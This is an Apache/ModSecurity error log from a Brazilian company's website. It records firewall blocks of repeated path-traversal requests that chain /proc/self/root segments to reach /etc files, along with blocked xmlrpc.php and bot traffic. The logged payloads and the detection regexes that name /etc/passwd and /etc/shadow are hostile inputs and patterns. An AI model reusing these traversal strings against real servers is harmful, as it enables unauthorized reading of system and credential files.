[Tue Mar 17 10:50:27.895049 2026] [:error] [pid 17965:tid 140411557287680] [client 74.7.243.203:41112] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcI6t8Nd0UC_OcbVG3hQAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:50:31.465982 2026] [access_compat:error] [pid 18380:tid 140411733534464] [client 108.136.165.222:59479] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:50:31.467397 2026] [access_compat:error] [pid 18709:tid 140411674785536] [client 108.136.165.222:59478] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:50:40.027169 2026] [:error] [pid 18604:tid 140411607643904] [client 74.7.243.203:41118] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcMEBd0UqwxWindINwUgAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:50:49.159661 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.243.203:56140] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcOQeiSKl8TjouI-YJYAAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:50:54.894926 2026] [:error] [pid 18380:tid 140411733534464] [client 74.7.243.203:45930] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcPq4xEDsg_V3ESNY7sQAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:51:15.819256 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.228.16:33502] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablcU6BJNF7axNlVR0UEfQAAAAo"]
[Tue Mar 17 10:51:20.239018 2026] [:error] [pid 17965:tid 140411741927168] [client 74.7.243.203:45940] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcWKt8Nd0UC_OcbVG3zQAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:51:25.081561 2026] [:error] [pid 17965:tid 140411557287680] [client 74.7.243.203:52772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcXat8Nd0UC_OcbVG32QAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:51:27.751504 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.243.203:52776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcX9CmCSWTlPouqorUQAAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:51:46.056936 2026] [:error] [pid 18604:tid 140411624429312] [client 74.7.243.203:52784] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcckBd0UqwxWindINwfQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:51:49.716354 2026] [:error] [pid 18709:tid 140411699963648] [client 74.7.241.46:52846] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcdTarLhPAjZGI1b22OwAAA4U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:51:51.139127 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.243.203:57752] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcd6BJNF7axNlVR0UEkAAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:52:04.645117 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.243.203:38426] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablchKBJNF7axNlVR0UEnwAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:52:12.891158 2026] [:error] [pid 1016:tid 140411716749056] [client 74.7.243.203:59462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcjJqmL8PQht4WJFlPxAAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:52:20.276662 2026] [:error] [pid 2325:tid 140411557287680] [client 74.7.243.203:34054] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcku82sZHvlq4xgHrLswAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:52:27.375733 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.243.203:55482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcm5qmL8PQht4WJFlPzgAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:52:41.095371 2026] [:error] [pid 17965:tid 140411641214720] [client 74.7.241.46:39438] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcqat8Nd0UC_OcbVG4WwAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:53:32.694216 2026] [:error] [pid 2325:tid 140411607643904] [client 74.7.243.203:55488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablc3O82sZHvlq4xgHrMDAAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:56:03.790301 2026] [:error] [pid 8298:tid 140411725141760] [client 74.7.241.46:60486] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldc5dzf3e7m9lz3ZHOnwAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:56:09.367973 2026] [:error] [pid 9299:tid 140411607643904] [client 74.7.241.46:55726] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldeb-sgTmmJoPuMdynJAAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:12.973958 2026] [:error] [pid 8856:tid 140411590858496] [client 74.7.243.203:38416] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldfHUHeC6oxrTQ0VC2zwAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:56:19.342255 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.241.46:42758] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldg-82sZHvlq4xgHrMOQAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:20.627252 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.228.16:36800] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abldhAeiSKl8TjouI-YJuQAAA8E"]
[Tue Mar 17 10:56:26.635367 2026] [:error] [pid 17965:tid 140411641214720] [client 74.7.243.203:55518] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldiqt8Nd0UC_OcbVG4zwAAAIw"], referer: 